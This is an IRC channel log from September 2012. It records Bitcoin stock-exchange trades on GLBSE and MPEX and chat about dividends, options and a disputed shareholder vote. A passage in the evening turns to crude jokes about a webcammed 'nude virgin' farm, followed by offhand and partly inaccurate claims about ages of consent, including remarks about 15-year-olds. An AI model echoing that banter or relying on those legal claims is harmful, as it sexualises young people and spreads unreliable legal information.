[+] Sep 29 05:44:59 BTC-MINING currently has 2369 shares on GLBSE Sep 29 05:44:59 Namworld has loaned out 2354 BTC to Amazingrando. Sep 29 05:45:02 is this correct ? Sep 29 05:49:55 [GLBSE] [SILVER] 10 @ 0.00999996 = 0.1 BTC [+] Sep 29 05:53:49 [GLBSE] [BLUECHIP] 2 @ 0.1 = 0.2 BTC [+] Sep 29 05:54:59 [GLBSE] [SILVER] 5 @ 0.00999996 = 0.05 BTC [+] Sep 29 06:02:13 [MPEX] [F.GIGA.ETF] 2600 @ 0.00044036 = 1.1449 BTC [-] Sep 29 06:02:15 [MPEX] [S.MPOE] 37900 @ 0.00036359 = 13.7801 BTC [-] Sep 29 06:04:19 [GLBSE] [NASTY] 1 @ 0.3698 BTC [+] Sep 29 06:08:46 [GLBSE] [FDBF] 4 @ 0.149253 = 0.597 BTC [+] Sep 29 06:09:28 [GLBSE] [FDBF] 15 @ 0.149253 = 2.2388 BTC [+] Sep 29 06:09:50 [GLBSE] [FDBF] 1 @ 0.149253 BTC [+] Sep 29 06:12:24 poof Sep 29 06:18:13 [GLBSE] [MU] 3 @ 0.19 = 0.57 BTC [-] Sep 29 06:19:15 ;;later tell kakobrekla i bet i know what it is. 214290254453 > maxint ? Sep 29 06:19:15 The operation succeeded. Sep 29 06:21:59 mircea_popescu: When I do stat, I don't see anything showing the call options settled at expiration. Is there any way to see those settlement transactions? Sep 29 06:22:30 sgornick were you holding long calls or short with btc deposited to cover ? Sep 29 06:22:40 long calls. Sep 29 06:23:00 then pretty much all you'd see is your balance jump Sep 29 06:23:33 mircea_popescu: sounds about right Sep 29 06:23:56 BTC-Mining i didn't know he had significant loans Sep 29 06:25:24 Hm ... was the settle amount $12.35, 24 hour WAP from bitcoincharts? If so, something is up as my balance is less than what that CALL expiration settlement should have yielded. Sep 29 06:26:12 He has, we got less than market rate hashing and only 100% buyback instead of 110% of average price in exchange of a guarantee of the hashing being bought back. Sep 29 06:26:29 sgornick pm me your key we look into this Sep 29 06:26:47 BTC-Mining i see Sep 29 06:26:47 We've been paying the returns on said loan. Sep 29 06:27:11 !pl BTC-MINING 1 Sep 29 06:27:12 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 29 06:27:17 BTC-MINING [1@1BTC] paid: 0.27012647 BTC. Last price: 0.95999999 BTC. Capital gain: -0.04000001 BTC. Total: 0.23012646 BTC. (23%) Sep 29 06:27:23 0.27 paid so far. Sep 29 06:28:53 a so you're sorta teamed up ? Sep 29 06:29:09 That's what kept the price of BTC-MINING so high, technically we pay out, although less, and we have not spent funds on any of the ASICs offer yet. Sep 29 06:29:51 aha Sep 29 06:30:36 Yes, amazingrando was expanding with BITBOND and had a lot of hashing unsold. We struck a deal for less hashing, but with a repayment clause. Sep 29 06:30:45 leaves you in a good position with the price wars already starting Sep 29 06:30:53 Aye Sep 29 06:31:07 [MPEX] [S.MPOE] 6235 @ 0.00036359 = 2.267 BTC [-] Sep 29 06:31:09 [MPEX] [S.MPOE] 4100 @ 0.00036272 = 1.4872 BTC [-] Sep 29 06:31:10 [MPEX] [S.MPOE] 21900 @ 0.00036265 = 7.942 BTC [-] Sep 29 06:31:33 I'm off for a bit. Sep 29 06:36:45 The financial and banking industries are on high alert tonight as a massive cyberattack continues, with potentially millions of customers of Bank of America, PNC and Wells Fargo finding themselves blocked from banking online. Sep 29 06:36:47 dun dun dun Sep 29 06:37:28 [GLBSE] [YABMC] 2 @ 0.07770999 = 0.1554 BTC [-] Sep 29 06:38:54 [GLBSE] [BTCMC] 1 @ 0.45000001 BTC [-] Sep 29 06:41:15 [GLBSE] [NYAN.C] 1 @ 0.2898 BTC [-] Sep 29 06:45:06 mircea_popescu: Nice growth on the CALL options: http://bitcointalk.org/index.php?topic=64962.msg1230250#msg1230250 Sep 29 06:45:33 o hey nice graph Sep 29 06:49:47 Thanks. One thing I see on the Mt Gox semi-annual "transparency report" is the amount of deposits for the most recent 30-day. Sep 29 06:49:48 By itself it doesn't give too much info, as without knowing withdrawals, cannot do a net infow calculation to see what is left. But it is useful to see a month-to-month trend. Sep 29 06:50:06 it's impossible to do on mpex tho Sep 29 06:50:08 Think MPEx might be able to spill those numbers? Sep 29 06:51:01 nope. there's income from private deposits ; margin opening and closing ; paper arrangements (such as deposits of shares, non-btc settlements, etc) Sep 29 06:53:26 the likely most reasonable avenue is to follow the public address (1Fx3N5iFPDQxUKhhmDJqCMmi3U8Y7gSncx) Sep 29 06:53:37 it won't give exact totals, but it will likely give a decent indication Sep 29 06:54:18 at least trend-wise. maybe. Sep 29 06:54:23 [GLBSE] [CPA] 3 @ 0.0465 = 0.1395 BTC [-] Sep 29 06:55:01 [GLBSE] [FZB.A] 1 @ 0.02000001 BTC [-] Sep 29 06:55:58 !pl cpa Sep 29 06:55:59 !pl [@] [] Sep 29 06:56:12 !ticker cpa Sep 29 06:56:15 [GLBSE:CPA] [Bid: 0.04] [Ask: 0.0465] [Spread: 0.0065] [Last: 0.0465] [24hVol: 0.41997] [7dAvg: 0.0366837] Sep 29 07:01:08 [MPEX] [F.GIGA.ETF] 4338 @ 0.00044037 = 1.9103 BTC [+] Sep 29 07:01:09 [MPEX] [F.GIGA.ETF] 5462 @ 0.00044037 = 2.4053 BTC [+] Sep 29 07:05:42 Hi all, Sep 29 07:05:42 Im gauging interest in a GLBSE bearish fund. This fund would be run on the assumption that nearly everything currently on GLBSE will, in the long run, produce a negative ROI, as almost all the assets are overpriced, insolvent, a scam or (indirect) passthroughs to (other passthroughs to) overpriced assets, insolvent assets or scams. Sep 29 07:05:49 why do people always copy me w/o credit meh. Sep 29 07:06:37 jealousy Sep 29 07:06:56 teh suck! Sep 29 07:07:30 [GLBSE] [RSM] 2 @ 0.29 = 0.58 BTC [+] Sep 29 07:20:26 ;;later tell nefario inquiring minds want to know : how's the conference where nobody went manage to "sell out" and also leave a 400 quid hole in your pocket ? thanks! Sep 29 07:20:27 The operation succeeded. Sep 29 07:28:07 [MPEX] [S.MPOE] 31865 @ 0.000362 = 11.5351 BTC [-] Sep 29 07:28:08 [MPEX] [S.MPOE] 23479 @ 0.00036227 = 8.5057 BTC [+] Sep 29 07:35:40 [GLBSE] [YABMC] 9 @ 0.07770999 = 0.6994 BTC [-] Sep 29 07:35:41 [GLBSE] [YABMC] 2 @ 0.07771 = 0.1554 BTC [+] Sep 29 07:35:43 [GLBSE] [YABMC] 2 @ 0.07774 = 0.1555 BTC [+] Sep 29 07:35:44 [GLBSE] [YABMC] 2 @ 0.07777 = 0.1555 BTC [+] Sep 29 07:35:45 [GLBSE] [YABMC] 2 @ 0.0778 = 0.1556 BTC [+] Sep 29 07:35:46 [GLBSE] [YABMC] 2 @ 0.07783 = 0.1557 BTC [+] Sep 29 07:35:48 [GLBSE] [YABMC] 3 @ 0.07786 = 0.2336 BTC [+] Sep 29 07:35:49 [GLBSE] [YABMC] 3 @ 0.07789 = 0.2337 BTC [+] Sep 29 07:35:49 [GLBSE] [YABMC] 2 @ 0.07792 = 0.1558 BTC [+] Sep 29 07:35:50 [GLBSE] [YABMC] 15 @ 0.07795 = 1.1693 BTC [+] Sep 29 07:35:51 [GLBSE] [YABMC] 5 @ 0.079 = 0.395 BTC [+] Sep 29 07:39:03 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 29 07:39:21 CPA [1@0.1BTC] paid: 0.00569688 BTC. Last price: 0.0465 BTC. Capital gain: -0.0535 BTC. Total: -0.04780312 BTC. (-47.8%) Sep 29 07:45:07 [MPEX] [S.MPOE] 37621 @ 0.00036227 = 13.629 BTC [+] Sep 29 07:45:09 [MPEX] [S.MPOE] 51500 @ 0.00036476 = 18.7851 BTC [+] Sep 29 07:45:10 [MPEX] [S.MPOE] 61501 @ 0.00036667 = 22.5506 BTC [+] Sep 29 07:45:11 [MPEX] [S.MPOE] 52700 @ 0.00036669 = 19.3246 BTC [+] Sep 29 07:45:12 [MPEX] [S.MPOE] 30000 @ 0.00036735 = 11.0205 BTC [+] Sep 29 07:45:14 [MPEX] [S.MPOE] 36760 @ 0.00036774 = 13.5181 BTC [+] Sep 29 07:45:14 [MPEX] [S.MPOE] 48531 @ 0.00036841 = 17.8793 BTC [+] Sep 29 07:45:15 [MPEX] [S.MPOE] 37398 @ 0.00037073 = 13.8646 BTC [+] Sep 29 07:45:16 [MPEX] [S.MPOE] 34600 @ 0.00037131 = 12.8473 BTC [+] Sep 29 07:45:17 [MPEX] [S.MPOE] 66335 @ 0.00037144 = 24.6395 BTC [+] Sep 29 07:45:18 [MPEX] [S.MPOE] 59136 @ 0.00037195 = 21.9956 BTC [+] Sep 29 07:45:19 [MPEX] [S.MPOE] 38600 @ 0.00037238 = 14.3739 BTC [+] Sep 29 07:45:20 [MPEX] [S.MPOE] 48358 @ 0.00037269 = 18.0225 BTC [+] Sep 29 07:45:22 [MPEX] [S.MPOE] 66404 @ 0.00037391 = 24.8291 BTC [+] Sep 29 07:45:23 [MPEX] [S.MPOE] 500 @ 0.00037499 = 0.1875 BTC [+] Sep 29 07:45:23 [MPEX] [S.MPOE] 480000 @ 0.000375 = 180 BTC [+] Sep 29 07:51:18 [GLBSE] [NASTY] 1 @ 0.3698 BTC [+] **** BEGIN LOGGING AT Sat Sep 29 16:17:38 2012 Sep 29 16:26:03 [MPEX] [F.GIGA.ETF] 3900 @ 0.00044036 = 1.7174 BTC [-] Sep 29 16:35:14 [GLBSE] [PUREMINING] 6 @ 0.1032 = 0.6192 BTC [-] Sep 29 16:41:12 [MPEX] [S.MPOE] 35500 @ 0.00039999 = 14.1996 BTC [-] Sep 29 16:41:12 [MPEX] [S.MPOE] 2057 @ 0.00039856 = 0.8198 BTC [-] Sep 29 16:41:14 [MPEX] [S.MPOE] 27700 @ 0.00039854 = 11.0396 BTC [-] Sep 29 16:41:15 [MPEX] [S.MPOE] 32000 @ 0.00039794 = 12.7341 BTC [-] Sep 29 16:41:16 [MPEX] [S.MPOE] 24500 @ 0.0003978 = 9.7461 BTC [-] Sep 29 16:41:17 [MPEX] [S.MPOE] 45300 @ 0.00039761 = 18.0117 BTC [-] Sep 29 16:41:18 [MPEX] [S.MPOE] 2500 @ 0.00039681 = 0.992 BTC [-] Sep 29 16:41:20 [MPEX] [S.MPOE] 28900 @ 0.00039652 = 11.4594 BTC [-] Sep 29 16:41:21 [MPEX] [S.MPOE] 21543 @ 0.00039614 = 8.534 BTC [-] Sep 29 16:51:25 [MPEX] [S.MPOE] 57 @ 0.00039614 = 0.0226 BTC [-] Sep 29 16:51:26 [MPEX] [S.MPOE] 15200 @ 0.00038905 = 5.9136 BTC [-] Sep 29 16:51:28 [MPEX] [S.MPOE] 35376 @ 0.00038598 = 13.6544 BTC [-] Sep 29 16:51:29 [MPEX] [S.MPOE] 25700 @ 0.0003847 = 9.8868 BTC [-] Sep 29 16:51:29 [MPEX] [S.MPOE] 55800 @ 0.0003827 = 21.3547 BTC [-] Sep 29 16:52:49 [MPEX] [S.MPOE] 17055 @ 0.00037805 = 6.4476 BTC [-] Sep 29 16:52:50 [MPEX] [S.MPOE] 816756 @ 0.000375 = 306.2835 BTC [-] Sep 29 16:52:51 [MPEX] [S.MPOE] 63600 @ 0.00037365 = 23.7641 BTC [-] Sep 29 16:52:52 [MPEX] [S.MPOE] 36200 @ 0.00036187 = 13.0997 BTC [-] Sep 29 16:52:53 [MPEX] [S.MPOE] 6600 @ 0.00036173 = 2.3874 BTC [-] Sep 29 16:52:54 [MPEX] [S.MPOE] 9789 @ 0.00036168 = 3.5405 BTC [-] Sep 29 16:59:24 [MPEX] [S.DICE] 113241 @ 0.0034 = 385.0194 BTC [+] Sep 29 16:59:40 nom nom Sep 29 16:59:57 whoa Sep 29 17:00:07 that was a rather large buy Sep 29 17:00:12 :) Sep 29 17:00:37 I wonder what the special announcement will bring Sep 29 17:00:52 dividend is gonna be kinda crappy this month Sep 29 17:01:18 special announcement? Sep 29 17:01:23 I wonder who dumped all the S.MPOE... Surprisingly awesome results this month Sep 29 17:01:50 uhh... https://bitcointalk.org/index.php?topic=101902.500 Sep 29 17:02:03 Quick Update: The new site should be live within 2 weeks, I hope everyone is excited for it Also, there's another special announcement which will be made around the same time - should be very good for owners of S.DICE Sep 29 17:02:37 Last time, he gave out a surprise dividend of 2.3%... Sep 29 17:02:49 So I'm positioning myself for happiness Sep 29 17:03:16 gigavps you've missed all the 2-3k ones :p Sep 29 17:03:33 Bugpowder prolly divhunting i'd guess Sep 29 17:04:13 i invest in me Sep 29 17:04:18 S.MPOE is gonna have a large volume today Sep 29 17:04:33 I invest in America, fuck yeah Sep 29 17:04:42 dun dun dun Sep 29 17:04:44 Also Romania, I guess Sep 29 17:05:07 haha what, via owning mpoe ? Sep 29 17:05:13 yup Sep 29 17:05:15 mpoe is virtual baby. no country! Sep 29 17:07:16 Someone sell me some MPCD.A plz Sep 29 17:08:37 BTW - Thanks for the Bitcoins Direct recommendation, it was super easy, fast, cheaper than GOX and not as worrysome as OTC Sep 29 17:09:50 :p Sep 29 17:10:43 [MPEX] [S.BVPS] 1470 @ 0.0035 = 5.145 BTC [-] Sep 29 17:11:33 [MPEX] [S.MPOE] [PAID] 500000000 @ 0.00000059 = 293.32991155 BTC Sep 29 17:12:00 ok, now we're good. Sep 29 17:12:09 for some reason only 2.14k went out yest instead of 2.43k Sep 29 17:13:30 heh Sep 29 17:14:23 The extra is from the MPEx revenue? Sep 29 17:15:48 not really. just, was supposed to pay 243623245580 for some reason 214290254425 went out. Sep 29 17:15:53 still haven't figured out tha reason Sep 29 17:16:05 21429 is half of the MPOE profit Sep 29 17:16:19 o is it ? Sep 29 17:16:22 yes Sep 29 17:16:29 .py 4285.80508907 / 2 Sep 29 17:16:31 2142.90254453 Sep 29 17:16:33 duh lol Sep 29 17:16:37 i copied the wring line :D Sep 29 17:16:40 tyvm man! Sep 29 17:16:50 fucking hell i was like... omg this is sublte bug of 64/32 bit Sep 29 17:16:53 all hands on deck find it Sep 29 17:16:57 ppl were :((( noes Sep 29 17:17:03 so were you supposed to pay out the MPEX revenue too? Sep 29 17:17:07 ofcourse. Sep 29 17:17:12 ok great Sep 29 17:17:19 Dividend total : 4`872.46491161ii BTC. says so right there Sep 29 17:17:29 too bad I sold 200k shares this morning Sep 29 17:17:32 though Sep 29 17:17:39 whoops Sep 29 17:17:40 then someone else sold 1MM so whatever Sep 29 17:17:51 got a better price Sep 29 17:18:04 Still holding a bunch Sep 29 17:18:04 o you sold my shares? woe unto you! Sep 29 17:18:19 I'll buy the dip Sep 29 17:18:52 Gotta have funds in the S.DICE for the special announcement what could it be what could it beeee Sep 29 17:35:06 evening :) Sep 29 17:35:57 [MPEX] [S.BVPS] 292 @ 0.0035 = 1.022 BTC [-] Sep 29 17:38:54 usagi Sep 29 17:39:08 you have not corrected your reply on bitcointalk Sep 29 17:40:02 so i am almost forced to announce the incorrect count of the votes on GLBSE motion 148 as I voted NO Sep 29 17:40:16 in your thread Sep 29 17:40:34 hello all Sep 29 17:40:36 this wont do you any good since this is scammer language Sep 29 17:41:13 you are lying that you won cause the system failed, for all I know maybe everyone voted no\ Sep 29 17:41:28 i was told to contact you usagi Sep 29 17:41:34 are you on? Sep 29 17:42:08 So I will post a reply in the BMF thread that I voted NO and the motion told us 8000~~ yea en 0 no, that is not possible Sep 29 17:42:50 so either you will have to put up another motion or get scammer taged Sep 29 17:43:12 Its not what I want, its what the people wants Sep 29 17:44:12 I am interested in a loan or investments private message me Sep 29 17:44:55 [GLBSE] [FPGAMINING] 2 @ 0.495 = 0.99 BTC [+] Sep 29 17:47:47 PsychoticBoy: no Sep 29 17:47:55 yes Sep 29 17:47:55 nefario needs to look at this first Sep 29 17:48:07 because it has nothing to do with usagi, and I bet its effected other people's motions too Sep 29 17:48:08 I am replying now Sep 29 17:48:29 PsychoticBoy: btw, you did vote no BEFORE the motion closed, right? Sep 29 17:48:34 I voted NO so she-he cant be happy with a 100% victory cause maybe everyone voted NO Sep 29 17:48:42 DUH Sep 29 17:48:47 just making sure Sep 29 17:48:54 because its clearly closed now Sep 29 17:49:10 yep motion isnt visible anymore Sep 29 17:49:47 PsychoticBoy: but yes, dont blame usagi here Sep 29 17:49:51 its clearly a bug in the glbse software Sep 29 17:49:52 So in the end who is lying to share holders now Sep 29 17:50:07 dont tell them Yeah I won Sep 29 17:50:19 erm, how many shares do you have? Sep 29 17:50:30 cause its for sure usagi did not win a flawless victory Sep 29 17:50:39 maybe usagi lost Sep 29 17:50:56 I wonder if the glbse software can even audit votes Sep 29 17:51:03 because it should be logged internally that you voted no Sep 29 17:51:07 [GLBSE] [BFLS] 1 @ 0.5 BTC [+] Sep 29 17:51:12 PsychoticBoy: usagi owns more than 50% of the shares so Sep 29 17:51:13 its not the poinbt how many I own, 1 is enough< Sep 29 17:51:20 (s)he probably won :P Sep 29 17:51:33 because all votes were yes and i voted no Sep 29 17:51:33 PsychoticBoy: yes, but the motions are based on shares voting Sep 29 17:51:39 so vote is false Sep 29 17:51:42 so if two people vote, one guy has 99 votes and one guy has 1 Sep 29 17:51:49 one votes yes, one votes no Sep 29 17:51:53 its not 50/50, its 99/1 Sep 29 17:52:06 so you just made my point Sep 29 17:52:14 you had a point? Sep 29 17:52:24 results were 0 no as i voted no, i would be 1 at least Sep 29 17:52:31 PsychoticBoy: yes it should Sep 29 17:52:32 BUT Sep 29 17:52:35 this has nothing to do with usagi Sep 29 17:52:39 its nefario's problem Sep 29 17:52:53 usagi relies on the glbse software to produce correct results Sep 29 17:52:58 if it doesnt, you cant blame usagi Sep 29 17:53:01 no, she-he only has to correct her-his thread Sep 29 17:53:06 PsychoticBoy: no Sep 29 17:53:09 yes Sep 29 17:53:10 because theres no proof you even voted Sep 29 17:53:16 nefario needs to audit the motion. Sep 29 17:53:25 I pmed nefario Sep 29 17:53:25 [GLBSE] [YABMC] 1 @ 0.07898 BTC [-] Sep 29 17:53:39 Im not a bmf shareholder btw, so Im neutral in this Sep 29 17:53:48 asked him to fix his crappy motion system < Sep 29 17:53:49 but nefario needs to fix this Sep 29 17:53:56 if it happened to usagi, it'll happen to other motions too Sep 29 17:54:21 I am not happy Sep 29 17:54:27 neither am I Sep 29 17:54:34 I paid nefario to do a job, so has every other asset holder Sep 29 17:54:36 why the fuck wont he just do it Sep 29 17:59:21 ahhh, so s.mpoe made 960 block rewards the prev month Sep 29 17:59:30 .py 30 * 24 * 6 Sep 29 17:59:31 4320 Sep 29 17:59:43 almost 25%. i'm slush! Sep 29 17:59:48 lol Sep 29 17:59:51 hehehe Sep 29 18:00:00 [GLBSE] [MINING] 2 @ 0.79999999 = 1.6 BTC [-] Sep 29 18:00:30 [GLBSE] [COGNITIVE] 10 @ 0.4799 = 4.799 BTC [-] Sep 29 18:01:00 [MPEX] [F.GIGA.ETF] 2903 @ 0.00044036 = 1.2784 BTC [-] Sep 29 18:01:01 [MPEX] [F.GIGA.ETF] 1346 @ 0.00044036 = 0.5927 BTC [-] Sep 29 18:01:04 So I will post a reply in the BMF thread that I voted NO and the motion told us 8000~~ yea en 0 no, that is not possible <<< whoa ?! Sep 29 18:01:11 wait a second, how is this possible ? Sep 29 18:01:34 crappy glbse motion voting system sucks Sep 29 18:01:46 wtf omg ?! Sep 29 18:01:49 [GLBSE] [COGNITIVE] 5 @ 0.4799 = 2.3995 BTC [-] Sep 29 18:01:55 maybe all the no are counted as yes Sep 29 18:02:00 so for all you know ALL MOTIONS TO DATE are invalid !? Sep 29 18:02:08 that explains the 100% victory Sep 29 18:03:22 so untill the real voting counts comes in, this vote is not applicable Sep 29 18:03:38 dude glbse is falling apart. Sep 29 18:04:17 dont hope so, got more than a luxery mega car overthere in btc Sep 29 18:05:00 that's not too wise. Sep 29 18:05:22 no but the last thing you want is a bank run Sep 29 18:05:54 i think it's been happening lately. Sep 29 18:06:10 [GLBSE] [GSDPT] 31 @ 0.00339995 = 0.1054 BTC [+] Sep 29 18:06:47 I'm going to be withdrawing everything from glbse Sep 29 18:06:50 in the coming weeks Sep 29 18:07:05 [GLBSE] [BITBOND] 3 @ 0.3595 = 1.0785 BTC [+] Sep 29 18:07:06 [GLBSE] [BITBOND] 3 @ 0.35969 = 1.0791 BTC [+] Sep 29 18:07:07 [GLBSE] [BITBOND] 3 @ 0.3597 = 1.0791 BTC [+] Sep 29 18:07:08 [GLBSE] [BITBOND] 1 @ 0.35979 BTC [+] Sep 29 18:07:29 [GLBSE] [ASICMINER] 8 @ 0.113388 = 0.9071 BTC [-] Sep 29 18:08:52 nice what are you selling luceo, maybe we can make some sort of share trding deal Sep 29 18:09:22 or I just buy your account Sep 29 18:11:01 [GLBSE] [SS] 150 @ 0.0177 = 2.655 BTC [+] Sep 29 18:13:46 Oh - and how DID you get more yes votes than have EVER been in circulation? You didn't by some chance transfer unsold ones to yourself to vote with (then send them back) did you? I asked nefario about that particular nasty little trick a while back (by PM) but got no answer - so assume it IS possible for a company owner to generate as many yes votes on a motion as they like. Sep 29 18:13:51 so basically... Sep 29 18:14:57 motion failed Sep 29 18:17:02 [GLBSE] [ASICMINER] 10 @ 0.113388 = 1.1339 BTC [-] Sep 29 18:20:18 [GLBSE] [MU] 2 @ 0.19 = 0.38 BTC [-] Sep 29 18:24:46 mircea are you a nihilist? Sep 29 18:25:09 [GLBSE] [GSDPT] 99 @ 0.0034 = 0.3366 BTC [+] **** BEGIN LOGGING AT Sat Sep 29 18:29:01 2012 Sep 29 18:29:07 jcpham that q will need context Sep 29 18:30:20 soory i was thinking out loud Sep 29 18:33:44 [GLBSE] [BITCOINRS] 2 @ 0.05 = 0.1 BTC [+] Sep 29 18:43:09 [GLBSE] [BBBB] 400 @ 0.00016 = 0.064 BTC [-] Sep 29 18:49:05 [GLBSE] [BLUECHIP] 5 @ 0.1 = 0.5 BTC [+] Sep 29 18:51:52 [MPEX] [F.GIGA.ETF] 1480 @ 0.00044037 = 0.6517 BTC [+] Sep 29 18:51:53 [MPEX] [F.GIGA.ETF] 78 @ 0.00044037 = 0.0343 BTC [+] Sep 29 18:51:54 [MPEX] [F.GIGA.ETF] 1642 @ 0.00044037 = 0.7231 BTC [+] Sep 29 19:09:10 Attention Bitcoin Talk community. You have scorned my services and laughed off my threats, but starting on this day you will see that I am not a man to trifled with. I have spent the last hour consorting with dark spirits giving them such offerings as they desire and gaining their service. Now the ritual is complete and this forum is cursed. I shall not tell you the specifics of the ritual nor of the spirits at my behest lest one a Sep 29 19:09:10 mong you seek to counter it, but understand that it is very powerful and you shall soon see its affects right here in the forums. Sep 29 19:09:15 ok this explains everything Sep 29 19:16:45 wtf? Sep 29 19:17:00 [MPEX] [F.GIGA.ETF] 7007 @ 0.00044036 = 3.0856 BTC [-] Sep 29 19:17:30 your goat is cooked. Sep 29 19:17:40 if you were not so fucking crazy you could destroy glbse... Sep 29 19:19:06 Chaaang-Noi it is a quote from the forum. Sep 29 19:19:10 https://bitcointalk.org/index.php?topic=110513.0 Sep 29 19:19:15 might happen either way Sep 29 19:19:26 context is your freind... Sep 29 19:19:29 guruvan- ya glbse is doing a great job on its own Sep 29 19:19:45 Chaaang-Noi ya prolly shouldhave put quotation marks. Sep 29 19:19:49 lolz - yeah I saw the curse thread Sep 29 19:20:19 iv been away busy, did not see it Sep 29 19:20:49 [GLBSE] [BFLS] 5 @ 0.5 = 2.5 BTC [+] Sep 29 19:21:08 how;s the rice ? Sep 29 19:21:19 from what i hear it is growing Sep 29 19:21:28 close to harvest time Sep 29 19:21:35 i will buy after they harvest it Sep 29 19:21:49 someone should make an orchid farm tended by nude virginz Sep 29 19:21:53 and webcam the whole thing Sep 29 19:21:59 i could do that... Sep 29 19:22:09 where i live now is orchird country Sep 29 19:22:14 i can do the tech stuff Sep 29 19:22:22 prolly should talk to kink.com then lo; Sep 29 19:22:23 and the nude virgins could be gathered if i had the funds... Sep 29 19:23:34 sadly it hard to find a virgin over 18 that is buy able... if we were to do this we would need a large budget or 4 or 5 years of planing... Sep 29 19:23:50 now this is a point. Sep 29 19:24:09 the age of concent here is 15, so to find a virgin that is 18 she odds are wont look so hot... Sep 29 19:24:30 what the fuck.. Sep 29 19:24:36 ahaha if you make it with 15 yos everyone in the west will come bomb cambodga Sep 29 19:24:37 no idea Sep 29 19:24:49 korea is 13 japan is 12 :/ Sep 29 19:24:58 i dont even live in cambodia Sep 29 19:25:04 i dont know the age of consent there Sep 29 19:25:29 o i thought you were there Sep 29 19:25:47 i only know about korea and japan cuz of matthew n wrights joy for the young Sep 29 19:25:52 no i live in thailand Sep 29 19:25:52 romania is 16. actually pretty much everywhere it's not 18 Sep 29 19:26:10 except massachussetts where it's 21 Sep 29 19:26:13 or 24 i dont recall Sep 29 19:27:04 lol i dont know Sep 29 19:27:18 id be shocked if mass was over 18 honestly Sep 29 19:27:20 im going to call bs Sep 29 19:27:35 im just digging at them :p\ Sep 29 19:27:41 i see Sep 29 19:28:00 europe is 16 right? Sep 29 19:28:08 germany is 14 england is 15? spaidn is 13? Sep 29 19:28:26 yeman is like 11 or something, crazy musliumz Sep 29 19:29:13 [GLBSE] [GIGAMINING] 1 @ 0.54999999 BTC [-] Sep 29 19:40:52 europe is mostly 16, but all sorts of conditions Sep 29 19:42:12 [MPEX] [F.GIGA.ETF] 229 @ 0.00044037 = 0.1008 BTC [+] Sep 29 19:42:14 [MPEX] [F.GIGA.ETF] 6900 @ 0.00044037 = 3.0386 BTC [+] Sep 29 19:42:15 [MPEX] [F.GIGA.ETF] 1110 @ 0.00044037 = 0.4888 BTC [+] Sep 29 19:54:21 [GLBSE] [BTC-MINING] 1 @ 0.9786 BTC [+] Sep 29 19:56:32 [GLBSE] [KRAKEN] 13 @ 0.0089 = 0.1157 BTC [+] Sep 29 19:56:57 oh shit kraken is traded on glbse Sep 29 19:57:09 what was the ipo price? Sep 29 19:57:41 1 ? Sep 29 20:03:36 Looks like it was 0.01 Sep 29 20:04:04 !pl kraken 0.01 Sep 29 20:04:05 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 29 20:04:54 KRAKEN [1@0.01BTC] paid: 0.00018223 BTC. Last price: 0.0089 BTC. Capital gain: -0.0011 BTC. Total: -0.00091777 BTC. (-9.2%) Sep 29 20:05:07 seems about right Sep 29 20:06:57 [MPEX] [O.BTCUSD.C010T] 1000 @ 0.92185114 = 921.8511 BTC [+] Sep 29 20:07:10 [MPEX] [O.BTCUSD.C010N] 1000 @ 0.92185114 = 921.8511 BTC [-] Sep 29 20:08:14 [GLBSE] [JTME] 1 @ 0.661 BTC [-] Sep 29 20:09:05 [GLBSE] [JTME] 1 @ 0.66 BTC [-] Sep 29 20:09:06 mircea Sep 29 20:09:08 did you see what i said Sep 29 20:09:10 about the 50 btc Sep 29 20:09:36 rg i don't think so ? Sep 29 20:11:52 Wow, somebody went really long on mpex... Sep 29 20:13:14 Or was a short? Sep 29 20:13:32 He sold those calls? Sep 29 20:13:46 [GLBSE] [YABMC] 2 @ 0.07073001 = 0.1415 BTC [-] Sep 29 20:14:28 rdponticelli prolly a short Sep 29 20:14:38 Yea, was short Sep 29 20:14:46 [GLBSE] [YABMC] 5 @ 0.07073 = 0.3537 BTC [-] Sep 29 20:14:46 oh Sep 29 20:14:48 well Sep 29 20:14:49 what i said was Sep 29 20:14:52 take that 50 btc out of my MPEX Sep 29 20:14:55 you're free to do so Sep 29 20:14:55 [MPEX] [O.BTCUSD.C010T] 1000 @ 0.92185114 = 921.8511 BTC [+] Sep 29 20:15:25 [MPEX] [O.BTCUSD.C010N] 714 @ 0.92185114 = 658.2017 BTC [-] Sep 29 20:15:27 Even shorter.... Sep 29 20:15:32 ding ding Sep 29 20:15:38 i wonder why not just buy puts Sep 29 20:15:44 np rg. Sep 29 20:15:44 I'm scared Sep 29 20:15:55 [GLBSE] [MOORE] 3 @ 0.49000001 = 1.47 BTC [+] Sep 29 20:17:57 actually if you think about it, it'sd not such a bad ploy. Sep 29 20:18:02 [GLBSE] [MOORE] 1 @ 0.46 BTC [-] Sep 29 20:18:09 person makes a call, costs ~1btc. sells it for .921 Sep 29 20:18:39 if btc goes to 1000 usd he loses like 7% of his money, if that. Sep 29 20:19:11 if however btc goes to 5 the call is worth .8 so has made 12% Sep 29 20:19:23 if btc goes to 2 has made 42% Sep 29 20:21:18 (n-1) / n = .921 ; .921 * n = n-1 ; 1 = .079n ; n = Sep 29 20:21:24 .py 1 / 0.079 Sep 29 20:21:25 12.6582278481 Sep 29 20:21:36 breakeven is 12.65 so... not horrible. Sep 29 20:26:28 [MPEX] [O.BTCUSD.C010T] 1000 @ 0.92185114 = 921.8511 BTC [+] Sep 29 20:28:10 The guy is depleting your bot Sep 29 20:30:36 if he's selling into it it's actuallty impleting it not deplerting it Sep 29 20:31:25 [MPEX] [O.BTCUSD.C010T] 447 @ 0.92185114 = 412.0675 BTC [+] Sep 29 20:34:15 [MPEX] [S.DICE] 3200 @ 0.0034 = 10.88 BTC [+] Sep 29 20:40:19 [GLBSE] [ASICMINER] 1 @ 0.11300001 BTC [-] Sep 29 20:43:25 [GLBSE] [ASICMINER] 1 @ 0.11300001 BTC [-] Sep 29 20:45:58 [GLBSE] [ASICMINER] 3 @ 0.111 = 0.333 BTC [-] Sep 29 20:46:00 [GLBSE] [ASICMINER] 14 @ 0.11 = 1.54 BTC [-] Sep 29 20:47:20 mircea Sep 29 20:47:26 tell us the largest mpex account Sep 29 20:47:28 what's the balance Sep 29 20:47:49 [GLBSE] [OBSI.HRPT] 1 @ 0.03399999 BTC [+] Sep 29 20:47:51 [GLBSE] [OBSI.HRPT] 99 @ 0.034 = 3.366 BTC [+] Sep 29 20:48:33 naah Sep 29 20:49:26 tho if you're going portofolio value it's prolly me, seeing how i hold my mpoe shares there. Sep 29 20:50:16 i dont 